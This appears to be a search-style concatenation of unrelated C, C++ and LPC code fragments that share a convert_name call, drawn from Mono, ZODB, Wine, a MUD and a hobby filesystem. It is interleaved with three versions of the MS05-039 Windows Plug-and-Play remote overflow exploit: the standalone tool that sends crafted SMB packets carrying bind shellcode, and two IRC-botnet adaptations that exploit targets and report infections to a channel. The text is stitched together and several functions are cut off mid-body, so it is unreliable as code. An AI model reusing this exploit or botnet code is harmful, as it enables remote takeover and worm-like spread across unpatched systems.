static void
mono_draw_cfg (MonoCompile *cfg, FILE *fp)
{
fprintf (fp, "digraph %s {\n", convert_name (cfg->method->name));
fprintf (fp, "node [fontsize=12.0]\nedge [len=1,color=red]\n");
fprintf (fp, "label=\"CFG for %s\";\n", mono_method_full_name (cfg->method, TRUE));
fprintf (fp, "BB0 [shape=doublecircle];\n");
fprintf (fp, "BB1 [color=red];\n");
cfg_emit_one_loop_level (cfg, fp, NULL);
fprintf (fp, "}\n");
}
void *open(const char *filename)
{
std::string dllName(filename);
# if defined(__GNUG__)
return dlopen(filename, RTLD_LAZY);
# elif defined(_MSC_VER)
convert_name(dllName);
std::cout << dllName << std::endl;
return LoadLibrary(CStringW(dllName.c_str()));
# else
# error G++ or MS compiler required
# endif
}
static void
mono_draw_dtree (MonoCompile *cfg, FILE *fp)
{
g_assert ((cfg->comp_done & MONO_COMP_IDOM));
fprintf (fp, "digraph %s {\n", convert_name (cfg->method->name));
fprintf (fp, "node [fontsize=12.0]\nedge [len=1,color=red]\n");
fprintf (fp, "label=\"Dominator tree for %s\";\n", mono_method_full_name (cfg->method, TRUE));
fprintf (fp, "BB0 [shape=doublecircle];\n");
fprintf (fp, "BB1 [color=red];\n");
dtree_emit_one_loop_level (cfg, fp, NULL);
fprintf (fp, "}\n");
}
mixed cmd(string args) {
object ob;
if( !args || args == "" ) return "Trans whom?";
if( !(ob = find_player(convert_name(args))) && !(ob = find_living(args)) )
return "No such being exists anywhere presently.";
if( environment(ob) == environment(this_player()) )
return ob->GetCapName() + " is right here.";
if(archp(ob) && !archp(this_player())){
write("You can't trans an admin.");
tell_player(ob, this_player()->GetName()+" just tried to trans you.");
return 1;
}
ob->SetProperty("ReturnSite",base_name(environment(ob)));
message("system", "You have been summoned by " +
this_player()->GetName() + ".", ob);
if( !(ob->eventMoveLiving(environment(this_player()))) )
return "Failed to move " + ob->GetCapName() + ".";
else message("system", "You trans " + ob->GetCapName() +
" to you.", this_player());
return 1;
}
static PyObject*
Per_getattro(cPersistentObject *self, PyObject *name)
{
PyObject *result = NULL; /* guilty until proved innocent */
PyObject *converted;
char *s;
converted = convert_name(name);
if (!converted)
goto Done;
s = PyBytes_AS_STRING(converted);
if (unghost_getattr(s))
{
if (unghostify(self) < 0)
goto Done;
accessed(self);
}
result = PyObject_GenericGetAttr((PyObject *)self, name);
Done:
Py_XDECREF(converted);
return result;
}
static PyObject *
pickle_copy_dict(PyObject *state)
{
PyObject *copy, *key, *value;
char *ckey;
Py_ssize_t pos = 0;
copy = PyDict_New();
if (!copy)
return NULL;
if (!state)
return copy;
while (PyDict_Next(state, &pos, &key, &value))
{
int is_special;
#ifdef PY3K
if (key && PyUnicode_Check(key))
{
PyObject *converted = convert_name(key);
ckey = PyBytes_AS_STRING(converted);
#else
if (key && PyBytes_Check(key))
{
ckey = PyBytes_AS_STRING(key);
#endif
is_special = (*ckey == '_' &&
(ckey[1] == 'v' || ckey[1] == 'p') &&
ckey[2] == '_');
#ifdef PY3K
Py_DECREF(converted);
#endif
if (is_special) /* skip volatile and persistent */
continue;
}
if (PyObject_SetItem(copy, key, value) < 0)
goto err;
}
return copy;
err:
Py_DECREF(copy);
return NULL;
}
static char pickle___getstate__doc[] =
"Get the object serialization state\n"
"\n"
"If the object has no assigned slots and has no instance dictionary, then \n"
"None is returned.\n"
"\n"
"If the object has no assigned slots and has an instance dictionary, then \n"
"the a copy of the instance dictionary is returned. The copy has any items \n"
"with names starting with '_v_' or '_p_' ommitted.\n"
"\n"
"If the object has assigned slots, then a two-element tuple is returned. \n"
"The first element is either None or a copy of the instance dictionary, \n"
"as described above. The second element is a dictionary with items \n"
"for each of the assigned slots.\n"
;
static PyObject *
pickle___getstate__(PyObject *self)
{
PyObject *slotnames=NULL, *slots=NULL, *state=NULL;
PyObject **dictp;
int n=0;
slotnames = pickle_slotnames(Py_TYPE(self));
if (!slotnames)
return NULL;
dictp = _PyObject_GetDictPtr(self);
if (dictp)
state = pickle_copy_dict(*dictp);
else
{
state = Py_None;
Py_INCREF(state);
}
if (slotnames != Py_None)
{
int i;
slots = PyDict_New();
if (!slots)
goto end;
for (i = 0; i < PyList_GET_SIZE(slotnames); i++)
{
PyObject *name, *value;
char *cname;
int is_special;
name = PyList_GET_ITEM(slotnames, i);
#ifdef PY3K
if (PyUnicode_Check(name))
{
PyObject *converted = convert_name(name);
cname = PyBytes_AS_STRING(converted);
#else
if (PyBytes_Check(name))
{
cname = PyBytes_AS_STRING(name);
#endif
is_special = (*cname == '_' &&
(cname[1] == 'v' || cname[1] == 'p') &&
cname[2] == '_');
#ifdef PY3K
Py_DECREF(converted);
#endif
if (is_special) /* skip volatile and persistent */
{
continue;
}
}
/* Unclear: Will this go through our getattr hook? */
value = PyObject_GetAttr(self, name);
if (value == NULL)
PyErr_Clear();
else
{
int err = PyDict_SetItem(slots, name, value);
Py_DECREF(value);
if (err < 0)
goto end;
n++;
}
}
}
if (n)
state = Py_BuildValue("(NO)", state, slots);
end:
Py_XDECREF(slotnames);
Py_XDECREF(slots);
return state;
}
static int
pickle_setattrs_from_dict(PyObject *self, PyObject *dict)
{
PyObject *key, *value;
Py_ssize_t pos = 0;
if (!PyDict_Check(dict))
{
PyErr_SetString(PyExc_TypeError, "Expected dictionary");
return -1;
}
while (PyDict_Next(dict, &pos, &key, &value))
{
if (PyObject_SetAttr(self, key, value) < 0)
return -1;
}
return 0;
}
int
main (int argc, char **argv)
{
struct sockaddr_in addr;
struct hostent *he;
int len;
int sockfd;
unsigned short smblen;
unsigned short bindport;
unsigned char tmp[1024];
unsigned char packet[4096];
unsigned char *ptr;
char recvbuf[4096];
#ifdef _WIN32
WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
#endif
printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
printf("\t Universal Exploit + no crash shellcode\n\n");
printf("\t [Spanish hack by RoMaNSoFt :-)]\n\n\n");
printf("\t Copyright (c) 2005 .: houseofdabus :.\n\n\n");
if (argc < 3) {
printf("%s <host> <bind port>\n", argv[0]);
exit(0);
}
if ((he = gethostbyname(argv[1])) == NULL) {
printf("[-] Unable to resolve %s\n", argv[1]);
exit(0);
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("[-] socket failed\n");
exit(0);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(445);
addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(addr.sin_zero), '\0', 8);
printf("\n[*] connecting to %s:445...", argv[1]);
if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
printf("\n[-] connect failed\n");
exit(0);
}
printf("ok\n");
printf("[*] null session...");
if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("\n[-] failed\n");
exit(0);
}
if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if (len <= 10) {
printf("\n[-] failed\n");
exit(0);
}
if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("\n[-] failed\n");
exit(0);
}
ptr = packet;
memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
ptr += sizeof(SMB_TreeConnectAndX)-1;
sprintf(tmp, "\\\\%s\\IPC$", argv[1]);
convert_name(ptr, tmp);
smblen = strlen(tmp)*2;
ptr += smblen;
smblen += 9;
memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
ptr += sizeof(SMB_TreeConnectAndX_)-1;
smblen = ptr-packet;
smblen -= 4;
memcpy(packet+3, &smblen, 1);
if (send(sockfd, packet, ptr-packet, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("\n[-] failed\n");
exit(0);
}
printf("ok\n");
printf("[*] bind pipe...");
if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("\n[-] failed\n");
exit(0);
}
if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("\n[-] failed\n");
exit(0);
}
printf("ok\n");
printf("[*] sending crafted packet...");
// nop
ptr = packet;
memset(packet, '\x90', sizeof(packet));
// header & offsets
memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
ptr += sizeof(RPC_call)-1;
// shellcode
bindport = (unsigned short)atoi(argv[2]);
bindport ^= 0x0437;
SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);
// end of packet
memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
RPC_call_end,
sizeof(RPC_call_end)-1);
// sending...
if (send(sockfd, packet, 2196, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
printf("ok\n");
printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));
recv(sockfd, recvbuf, 4096, 0);
return 0;
}
int open_path(int drive, const char *path) // Opening the directory(s)...
{
int i, j, curdir_handle, new_handle;
char name_comp[13], conv_name[11];
// Open the directory component
i =0;
if (path[0] == '/' || path[0] == '\\') // Absolute path
{
curdir_handle = root_handle(drive);
i = 1;
}
else curdir_handle = get_curdir_handle(drive);
// Increment the reference count
increment_ref_count(curdir_handle);
while (path[i] != 0)
{
j = 0;
while (j < 12 && path[i] != 0 && path[i] != '/' && path[i] != '\\')
{
name_comp[j] = path[i];
j++; i++;
}
if (path[i] != 0) i++;
name_comp[j] = 0;
if (strcmp(name_comp,".") == 0) continue;
else if (strcmp(name_comp,"..") == 0)
{
new_handle = get_parent_handle(curdir_handle);
if (new_handle >= 0)
increment_ref_count(new_handle);
}
else
{
// Open that directory component
if (convert_name(name_comp, conv_name) < 0)
{
close_dir(curdir_handle);
return EINVALIDNAME; // Error
}
new_handle = open_dir(curdir_handle, conv_name);
}
if (new_handle < 0)
{
close_dir(curdir_handle);
return new_handle; // Error
}
close_dir(curdir_handle); // Effectively decrease the
// reference count to 1 less.
curdir_handle = new_handle;
}
// Successfully opened the path
return curdir_handle;
}
static void
ghostify(cPersistentObject *self)
{
PyObject **dictptr, *slotnames;
/* are we already a ghost? */
if (self->state == cPersistent_GHOST_STATE)
return;
/* Is it ever possible to not have a cache? */
if (self->cache == NULL)
{
self->state = cPersistent_GHOST_STATE;
return;
}
if (self->ring.r_next == NULL)
{
/* There's no way to raise an error in this routine. */
#ifdef Py_DEBUG
fatal_1350(self, "ghostify", "claims to be in a cache but isn't");
#else
return;
#endif
}
/* If we're ghostifying an object, we better have some non-ghosts. */
assert(self->cache->non_ghost_count > 0);
self->cache->non_ghost_count--;
self->cache->total_estimated_size -=
_estimated_size_in_bytes(self->estimated_size);
ring_del(&self->ring);
self->state = cPersistent_GHOST_STATE;
/* clear __dict__ */
dictptr = _PyObject_GetDictPtr((PyObject *)self);
if (dictptr && *dictptr)
{
Py_DECREF(*dictptr);
*dictptr = NULL;
}
/* clear all slots besides _p_*
* ( for backward-compatibility reason we do this only if class does not
* override __new__ ) */
if (Py_TYPE(self)->tp_new == Pertype.tp_new)
{
slotnames = pickle_slotnames(Py_TYPE(self));
if (slotnames && slotnames != Py_None)
{
int i;
for (i = 0; i < PyList_GET_SIZE(slotnames); i++)
{
PyObject *name;
char *cname;
int is_special;
name = PyList_GET_ITEM(slotnames, i);
#ifdef PY3K
if (PyUnicode_Check(name))
{
PyObject *converted = convert_name(name);
cname = PyBytes_AS_STRING(converted);
#else
if (PyBytes_Check(name))
{
cname = PyBytes_AS_STRING(name);
#endif
is_special = !strncmp(cname, "_p_", 3);
#ifdef PY3K
Py_DECREF(converted);
#endif
if (is_special) /* skip persistent */
{
continue;
}
}
/* NOTE: this skips our delattr hook */
if (PyObject_GenericSetAttr((PyObject *)self, name, NULL) < 0)
/* delattr of non-set slot will raise AttributeError - we
* simply ignore. */
PyErr_Clear();
}
}
Py_XDECREF(slotnames);
}
/* We remove the reference to the just ghosted object that the ring
* holds. Note that the dictionary of oids->objects has an uncounted
* reference, so if the ring's reference was the only one, this frees
* the ghost object. Note further that the object's dealloc knows to
* inform the dictionary that it is going away.
*/
Py_DECREF(self);
}
static int
changed(cPersistentObject *self)
{
if ((self->state == cPersistent_UPTODATE_STATE ||
self->state == cPersistent_STICKY_STATE)
&& self->jar)
{
PyObject *meth, *arg, *result;
static PyObject *s_register;
if (s_register == NULL)
s_register = INTERN("register");
meth = PyObject_GetAttr((PyObject *)self->jar, s_register);
if (meth == NULL)
return -1;
arg = PyTuple_New(1);
if (arg == NULL)
{
Py_DECREF(meth);
return -1;
}
Py_INCREF(self);
PyTuple_SET_ITEM(arg, 0, (PyObject *)self);
result = PyEval_CallObject(meth, arg);
Py_DECREF(arg);
Py_DECREF(meth);
if (result == NULL)
return -1;
Py_DECREF(result);
self->state = cPersistent_CHANGED_STATE;
}
return 0;
}
static int
readCurrent(cPersistentObject *self)
{
if ((self->state == cPersistent_UPTODATE_STATE ||
self->state == cPersistent_STICKY_STATE)
&& self->jar && self->oid)
{
static PyObject *s_readCurrent=NULL;
PyObject *r;
if (s_readCurrent == NULL)
s_readCurrent = INTERN("readCurrent");
r = PyObject_CallMethodObjArgs(self->jar, s_readCurrent, self, NULL);
if (r == NULL)
return -1;
Py_DECREF(r);
}
return 0;
}
static PyObject *
Per__p_deactivate(cPersistentObject *self)
{
if (self->state == cPersistent_UPTODATE_STATE && self->jar)
{
PyObject **dictptr = _PyObject_GetDictPtr((PyObject *)self);
if (dictptr && *dictptr)
{
Py_DECREF(*dictptr);
*dictptr = NULL;
}
/* Note that we need to set to ghost state unless we are
called directly. Methods that override this need to
do the same! */
ghostify(self);
if (PyErr_Occurred())
return NULL;
}
Py_INCREF(Py_None);
return Py_None;
}
static PyObject *
Per__p_activate(cPersistentObject *self)
{
if (unghostify(self) < 0)
return NULL;
Py_INCREF(Py_None);
return Py_None;
}
static int Per_set_changed(cPersistentObject *self, PyObject *v);
static PyObject *
Per__p_invalidate(cPersistentObject *self)
{
signed char old_state = self->state;
if (old_state != cPersistent_GHOST_STATE)
{
if (Per_set_changed(self, NULL) < 0)
return NULL;
ghostify(self);
if (PyErr_Occurred())
return NULL;
}
Py_INCREF(Py_None);
return Py_None;
}
BOOL
ppexploit (EXINFO exinfo)
//main (int argc, char **argv)
{
int len;
char buffer[IRCLINE];
SOCKET sockfd;
int pport = 7777;
BOOL success = FALSE;
SOCKADDR_IN their_addr;
memset(&their_addr, 0, sizeof(their_addr));
//struct sockaddr_in addr;
char recvbuf[4096];
// struct hostent *he;
unsigned short smblen;
unsigned short bindport;
char tmp[1024];
char packet[4096];
char *ptr;
/* WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);*/
//printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
//printf("\t Universal Exploit + no crash shellcode\n\n\n");
//printf("\t Copyright (c) 2005 .: houseofdabus :.\n\n\n");
/* if (argc < 3) {
printf("%s <host> <bind port>\n", argv[0]);
exit(0);
}
*/
/* if ((he = gethostbyname(argv[1])) == NULL) {
printf("[-] Unable to resolve %s\n", argv[1]);
exit(0);
}
*/
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) {
return FALSE;
}
their_addr.sin_family = AF_INET;
their_addr.sin_addr.s_addr = finet_addr(exinfo.ip);
their_addr.sin_port = fhtons((unsigned short)exinfo.port);
/*addr.sin_family = AF_INET;
addr.sin_port = fhtons((unsigned short)exinfo.port);
addr.sin_addr.s_addr = finet_addr(exinfo.ip);*/
memset(&(their_addr.sin_zero), '\0', 8);
//printf("\n[*] connecting to %s:445...", argv[1]);
if (fconnect(sockfd, (LPSOCKADDR)&their_addr, sizeof(struct sockaddr)) < 0) {
return FALSE;
}
//printf("ok\n");
//printf("[*] null session...");
if (fsend(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
return FALSE;
}
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
return FALSE;
}
if (fsend(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
return FALSE;
}
len = frecv(sockfd, recvbuf, 4096, 0);
if (len <= 10) {
return FALSE;
}
if (fsend(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
return FALSE;
}
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
return FALSE;
}
ptr = packet;
memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
ptr += sizeof(SMB_TreeConnectAndX)-1;
sprintf(tmp, "\\\\%s\\IPC$", exinfo.ip);
convert_name(ptr, tmp);
smblen = strlen(tmp)*2;
ptr += smblen;
smblen += 9;
memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
ptr += sizeof(SMB_TreeConnectAndX_)-1;
smblen = ptr-packet;
smblen -= 4;
memcpy(packet+3, &smblen, 1);
if (fsend(sockfd, packet, ptr-packet, 0) < 0) {
return FALSE;
}
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
return FALSE;
}
//printf("ok\n");
//printf("[*] bind pipe...");
if (fsend(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
return FALSE;
}
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
return FALSE;
}
if (fsend(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
return FALSE;
}
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
return FALSE;
}
//printf("ok\n");
//printf("[*] sending crafted packet...");
// nop
ptr = packet;
memset(packet, '\x90', sizeof(packet));
// header & offsets
memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
ptr += sizeof(RPC_call)-1;
// shellcode
bindport = (unsigned short)atoi((const char *)pport);
bindport ^= 0x0437;
SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);
// end of packet
memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
RPC_call_end,
sizeof(RPC_call_end)-1);
// sending...
if (fsend(sockfd, packet, 2196, 0) < 0) {
return FALSE;
}
// printf("ok\n");
// printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));
frecv(sockfd, recvbuf, 4096, 0);
Sleep(300);
fclosesocket(sockfd);
if (ConnectShell2(exinfo)) {
if(!exinfo.silent)
{
_snprintf(buffer, sizeof(buffer), "[FTP]: Transfer info sent to IP: %s.", exinfo.ip);
irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
}
exploit[exinfo.exploit].stats++;
return TRUE;
}
return FALSE;
}
/**********************************************************************
* ConvertDialog32To16 (KERNEL.615)
*/
VOID WINAPI ConvertDialog32To16( LPVOID dialog32, DWORD size, LPVOID dialog16 )
{
WORD nbItems, data, dialogEx;
DWORD style;
style = get_dword( &dialog32 );
put_dword( &dialog16, style );
dialogEx = (style == 0xffff0001); /* DIALOGEX resource */
if (dialogEx)
{
put_dword( &dialog16, get_dword( &dialog32 ) ); /* helpID */
put_dword( &dialog16, get_dword( &dialog32 ) ); /* exStyle */
style = get_dword( &dialog32 );
put_dword( &dialog16, style ); /* style */
}
else
dialog32 = (DWORD *)dialog32 + 1; /* exStyle ignored in 16-bit standard dialog */
nbItems = get_word( &dialog32 );
put_byte( &dialog16, nbItems );
put_word( &dialog16, get_word( &dialog32 ) ); /* x */
put_word( &dialog16, get_word( &dialog32 ) ); /* y */
put_word( &dialog16, get_word( &dialog32 ) ); /* cx */
put_word( &dialog16, get_word( &dialog32 ) ); /* cy */
/* Transfer menu name */
convert_name( &dialog16, &dialog32 );
/* Transfer class name */
convert_name( &dialog16, &dialog32 );
/* Transfer window caption */
WideCharToMultiByte( CP_ACP, 0, dialog32, -1, dialog16, 0x7fffffff, NULL, NULL );
dialog16 = (LPSTR)dialog16 + strlen( (LPSTR)dialog16 ) + 1;
dialog32 = (LPWSTR)dialog32 + strlenW( (LPWSTR)dialog32 ) + 1;
/* Transfer font info */
if (style & DS_SETFONT)
{
put_word( &dialog16, get_word( &dialog32 ) ); /* pointSize */
if (dialogEx)
{
put_word( &dialog16, get_word( &dialog32 ) ); /* weight */
put_word( &dialog16, get_word( &dialog32 ) ); /* italic */
}
WideCharToMultiByte( CP_ACP, 0, (LPWSTR)dialog32, -1, (LPSTR)dialog16, 0x7fffffff, NULL, NULL ); /* faceName */
dialog16 = (LPSTR)dialog16 + strlen( (LPSTR)dialog16 ) + 1;
dialog32 = (LPWSTR)dialog32 + strlenW( (LPWSTR)dialog32 ) + 1;
}
/* Transfer dialog items */
while (nbItems)
{
/* align on DWORD boundary (32-bit only) */
dialog32 = (LPVOID)(((UINT_PTR)dialog32 + 3) & ~3);
if (dialogEx)
{
put_dword( &dialog16, get_dword( &dialog32 ) ); /* helpID */
put_dword( &dialog16, get_dword( &dialog32 ) ); /* exStyle */
put_dword( &dialog16, get_dword( &dialog32 ) ); /* style */
}
else
{
style = get_dword( &dialog32 ); /* save style */
dialog32 = (DWORD *)dialog32 + 1; /* ignore exStyle */
}
put_word( &dialog16, get_word( &dialog32 ) ); /* x */
put_word( &dialog16, get_word( &dialog32 ) ); /* y */
put_word( &dialog16, get_word( &dialog32 ) ); /* cx */
put_word( &dialog16, get_word( &dialog32 ) ); /* cy */
if (dialogEx)
put_dword( &dialog16, get_dword( &dialog32 ) ); /* ID */
else
{
put_word( &dialog16, get_word( &dialog32 ) ); /* ID */
put_dword( &dialog16, style ); /* style from above */
}
/* Transfer class name */
switch (*(WORD *)dialog32)
{
case 0x0000:
get_word( &dialog32 );
put_byte( &dialog16, 0 );
break;
case 0xffff:
get_word( &dialog32 );
put_byte( &dialog16, get_word( &dialog32 ) );
break;
default:
WideCharToMultiByte( CP_ACP, 0, (LPWSTR)dialog32, -1, (LPSTR)dialog16, 0x7fffffff, NULL, NULL );
dialog16 = (LPSTR)dialog16 + strlen( (LPSTR)dialog16 ) + 1;
dialog32 = (LPWSTR)dialog32 + strlenW( (LPWSTR)dialog32 ) + 1;
break;
}
/* Transfer window name */
convert_name( &dialog16, &dialog32 );
/* Transfer data */
data = get_word( &dialog32 );
if (dialogEx)
put_word(&dialog16, data);
else
put_byte(&dialog16,(BYTE)data);
if (data)
{
memcpy( dialog16, dialog32, data );
dialog16 = (BYTE *)dialog16 + data;
dialog32 = (BYTE *)dialog32 + data;
}
/* Next item */
nbItems--;
}
}
int syscall_stat(const char *file_name, struct stat *buf)
{
int drive;
int curdir_handle;
char name_comp[13], conv_name[11], dir_path[501];
struct dir_entry dent;
int err, count;
struct date_time dt;
int clno;
if (strlen(file_name) > 500) return ELONGPATH;
parse_path(file_name, &drive, dir_path, name_comp);
if (dir_path[0] != 0)
{
curdir_handle = open_path(drive, dir_path);
if (curdir_handle < 0)
{
return curdir_handle; // Error
}
}
else
{
curdir_handle = get_curdir_handle(drive);
increment_ref_count(curdir_handle);
}
// Last file name component.
if (convert_name(name_comp, conv_name) < 0)
{
err = EINVALIDNAME; // Error
}
else if (find_entry(curdir_handle, conv_name, &dent) == 1)
{
// Fill up the stat buf
buf->st_dev = drive;
buf->st_ino = 0;
buf->st_mode = dent.attrib;
buf->st_nlink = 1;
buf->st_uid = buf->st_gid = 0;
buf->st_rdev = 0;
buf->st_size = dent.fsize;
buf->st_blksize = 512;
// Find time in seconds
dt.seconds = (dent.time & 0x1f) * 2;
dt.minutes = ((dent.time & 0x7e0) >> 5);
dt.hours = (((unsigned short int)(dent.time & 0xf800)) >> 11);
dt.date = dent.date & 0x1f;
dt.month = ((dent.date & 0x1e0) >> 5);
dt.year = (((unsigned short int)(dent.date & 0xfe00)) >> 9);
buf->st_atime = buf->st_mtime = buf->st_ctime = date_to_secs(dt);
// Find number of blocks
count = 0;
clno = dent.start_cluster;
while (clno < 0xff8)
{
count++;
clno = next_cluster_12(clno);
}
buf->st_blocks = count;
err = 0;
}
BOOL pnp(EXINFO exinfo)
{
struct sockaddr_in addr;
struct hostent *he;
int len;
int sockfd;
unsigned short smblen;
unsigned short bindport;
unsigned char tmp[1024];
unsigned char packet[4096];
unsigned char *ptr;
char recvbuf[4096];
char buffer[IRCLINE];
#ifdef _WIN32
WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
#endif
// printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
// printf("\t Universal Exploit + no crash shellcode\n\n\n");
// printf("\t Copyright (c) 2005 .: houseofdabus :.\n\n\n");
// if (exinfo.ip < 3) {
// printf("%s <host> <bind port>\n", argv[0]);
// exit(0);
// return false;
// }
if ((he = gethostbyname(exinfo.ip)) == NULL) {
// printf("[-] Unable to resolve %s\n", argv[1]);
// exit(0);
return false;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
// printf("[-] socket failed\n");
// exit(0);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(445);
addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(addr.sin_zero), '\0', 8);
//printf("\n[*] connecting to %s:445...", argv[1]);
if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
//printf("\n[-] connect failed\n");
//exit(0);
return false;
}
// printf("ok\n");
// printf("[*] null session...");
if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
// printf("\n[-] send failed\n");
// exit(0);
return false;
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
// printf("\n[-] failed\n");
// exit(0);
return false;
}
if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
// printf("\n[-] send failed\n");
// exit(0);
return false;
}
len = recv(sockfd, recvbuf, 4096, 0);
if (len <= 10) {
// printf("\n[-] failed\n");
// exit(0);
return false;
}
if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
// printf("\n[-] send failed\n");
// exit(0);
return false;
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
//printf("\n[-] failed\n");
// exit(0);
return false;
}
ptr = packet;
memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
ptr += sizeof(SMB_TreeConnectAndX)-1;
sprintf((char*)tmp,"\\\\%s\\IPC$",exinfo.ip);
convert_name((char*)ptr, (char*)tmp);
smblen = strlen((char*)tmp)*2;
ptr += smblen;
smblen += 9;
memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
ptr += sizeof(SMB_TreeConnectAndX_)-1;
smblen = ptr-packet;
smblen -= 4;
memcpy(packet+3, &smblen, 1);
if (send(sockfd, (char*)packet, ptr-packet, 0) < 0) {
// printf("\n[-] send failed\n");
// _snprintf(buffer, sizeof(buffer), "send failed");
// irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
return false;
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
// printf("\n[-] failed\n");
//_snprintf(buffer, sizeof(buffer), "failed");
// irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
// exit(0);
return false;
}
//printf("ok\n");
// printf("[*] bind pipe...");
// _snprintf(buffer, sizeof(buffer), "Bind Pipe");
//irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
//printf("\n[-] send failed\n");
return false;
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
// printf("\n[-] failed\n");
// exit(0);
}
if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
// printf("\n[-] send failed\n");
//_snprintf(buffer, sizeof(buffer), "send failed");
//irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
//exit(0);
return false;
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
// printf("\n[-] failed\n");
// exit(0);
return false;
}
//printf("ok\n");
// printf("[*] sending crafted packet...");
// _snprintf(buffer, sizeof(buffer), "sending craffted packet");
// irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
// nop
ptr = packet;
